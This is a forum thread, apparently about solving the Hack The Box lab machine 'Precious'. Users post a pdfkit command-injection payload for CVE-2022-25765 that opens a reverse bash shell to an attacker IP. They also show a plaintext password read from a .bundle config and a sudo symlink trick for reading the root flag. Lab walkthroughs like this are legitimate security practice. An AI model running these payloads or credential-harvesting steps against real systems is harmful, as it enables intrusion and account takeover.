Posts: 74 Threads: 0 Joined: N/A November 26, 2022 at 6:57 PM Good luck everyone. We are probably dealing with this: CVE-2022-25765 PoC here: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795 For shell: http://localhost/?name=#{'%20`bash -c "bash -i >& /dev/tcp/10.10.XX.XX/8000 0>&1"`'}
Posts: 39 Threads: 0 Joined: N/A November 26, 2022 at 7:24 PM (November 26, 2022, 06:57 PM)11231123 Wrote: Good luck everyone.
We are probably dealing with this: CVE-2022-25765
PoC here: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
For shell:
http://localhost/?name=#{'%20`bash -c "bash -i >& /dev/tcp/10.10.XX.XX/8000 0>&1"`'}
Then? Posts: 74 Threads: 0 Joined: N/A November 26, 2022 at 7:34 PM (November 26, 2022, 07:24 PM)loosie Wrote: (November 26, 2022, 06:57 PM)11231123 Wrote: Good luck everyone.
We are probably dealing with this: CVE-2022-25765
PoC here: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
For shell:
http://localhost/?name=#{'%20`bash -c "bash -i >& /dev/tcp/10.10.XX.XX/8000 0>&1"`'}
Then? ruby@precious:~/.bundle$ cat config
---
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"
Posts: 39 Threads: 0 Joined: N/A November 26, 2022 at 7:43 PM (November 26, 2022, 07:34 PM)11231123 Wrote: (November 26, 2022, 07:24 PM)loosie Wrote: (November 26, 2022, 06:57 PM)11231123 Wrote: Good luck everyone.
We are probably dealing with this: CVE-2022-25765
PoC here: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
For shell:
http://localhost/?name=#{'%20`bash -c "bash -i >& /dev/tcp/10.10.XX.XX/8000 0>&1"`'}
Then?
ruby@precious:~/.bundle$ cat config
---
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"
bash: .bundle$: command not found what happend? Posts: 16 Threads: 0 Joined: N/A November 26, 2022 at 7:44 PM (November 26, 2022, 06:57 PM)11231123 Wrote: Good luck everyone.
We are probably dealing with this: CVE-2022-25765
PoC here: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
For shell:
http://localhost/?name=#{'%20`bash -c "bash -i >& /dev/tcp/10.10.XX.XX/8000 0>&1"`'}
privilege escalation is deserialization, how did you figure out what gem and version is being used? Actually, that it is ruby at all, even. Posts: 74 Threads: 0 Joined: N/A November 26, 2022 at 7:44 PM For root flag:[code]henry@precious:~$ ln -s /root/root.txt dependencies.ymlhenry@precious:~$ sudo /usr/bin/ruby /opt/update_dependencies.rbTraceback (most recent call last):/opt/update_dependencies.rb:20:in `': undefined method `each' for "":String (NoMethodError)[/code] Posts: 30 Threads: 0 Joined: N/A November 26, 2022 at 7:46 PM https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565
used payload2 worked like a charm, pretty straight forward box Posts: 74 Threads: 0 Joined: N/A November 26, 2022 at 7:50 PM (November 26, 2022, 07:44 PM)ILoveNSA Wrote: (November 26, 2022, 06:57 PM)11231123 Wrote: Good luck everyone.
We are probably dealing with this: CVE-2022-25765
PoC here: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
For shell:
http://localhost/?name=#{'%20`bash -c "bash -i >& /dev/tcp/10.10.XX.XX/8000 0>&1"`'}
privilege escalation is deserialization, how did you figure out what gem and version is being used?
Actually, that it is ruby at all, even. On the generated pdfs' metadata you can see: Creator: Generated by pdfkit v0.8.6 Posts: 39 Threads: 0 Joined: N/A November 26, 2022 at 7:54 PM (November 26, 2022, 07:44 PM)11231123 Wrote: For root flag:
henry@precious:~$ ln -s /root/root.txt dependencies.yml
henry@precious:~$ sudo /usr/bin/ruby /opt/update_dependencies.rb
Traceback (most recent call last):
/opt/update_dependencies.rb:20:in `<main>': undefined method `each' for "<flag>":String (NoMethodError)
Ok then? Posts: 45 Threads: 0 Joined: N/A November 26, 2022 at 7:55 PM (November 26, 2022, 07:48 PM)loosie Wrote: (November 26, 2022, 07:44 PM)11231123 Wrote: For root flag:
henry@precious:~$ ln -s /root/root.txt dependencies.yml
henry@precious:~$ sudo /usr/bin/ruby /opt/update_dependencies.rb
Traceback (most recent call last):
/opt/update_dependencies.rb:20:in `<main>': undefined method `each' for "<flag>":String (NoMethodError)
Sorry
uby@precious:~/.bundle$ cat config
cat config
---
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"
but i cant connect
(November 26, 2022, 07:34 PM)11231123 Wrote: (November 26, 2022, 07:24 PM)loosie Wrote: (November 26, 2022, 06:57 PM)11231123 Wrote: Good luck everyone.
We are probably dealing with this: CVE-2022-25765
PoC here: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
For shell:
http://localhost/?name=#{'%20`bash -c "bash -i >& /dev/tcp/10.10.XX.XX/8000 0>&1"`'}
Then?
ruby@precious:~/.bundle$ cat config
---
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"
Is that herny's ssh ? why it not working for me? su henry |
